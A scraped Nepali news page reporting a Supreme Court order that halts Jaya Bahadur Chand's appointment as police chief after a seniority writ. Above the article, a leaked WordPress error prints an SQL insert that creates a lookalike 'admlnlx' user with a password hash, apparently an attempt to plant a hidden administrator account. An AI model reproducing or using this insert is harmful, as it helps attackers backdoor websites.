WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BM9tEhgp.35oOwVT0Syf6Zw4u2.UlV/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:46:36', '', 'admlnlx', 'admlnlx')
काठमाडौ,फागुन २-
सर्वोच्व अदालतले सरकारले आईजीपीमा सिफारिस गरेका जयबहादुर चन्दलाई पदस्थापन नगराउन सरकारलाई अर्को आदेश जारी गरेको छ । आइतबारमात्र डीआईजी नवराज सिलवालले वरियता क्रम मिचेर सरकारले चन्दलाई आईजीपी बनाएको भन्दै सर्वोच्वमा रिट दायर गरेका थिए । सोमबार सुशीला कार्कीको इजलाशले अल्पकालीन अन्तरिम आदेश दिँदै चन्दलार्इ पदस्थापन नगर्न भनेको हो ।
आइतबार दिएको आदेशलाई पनि अदालतले यथावत राखेको छ ।रिट निवेदकको तर्फबाट वरिष्ठ अधिवक्ता शम्भू थापा, तुलसी भट्ट, अधिवक्ताहरु गोविन्द बन्दी, टीकाराम भट्टराई, ओमप्रकाश अर्याल, ऋषिराम घिमिरे लगायतले बहस गरेका थिए ।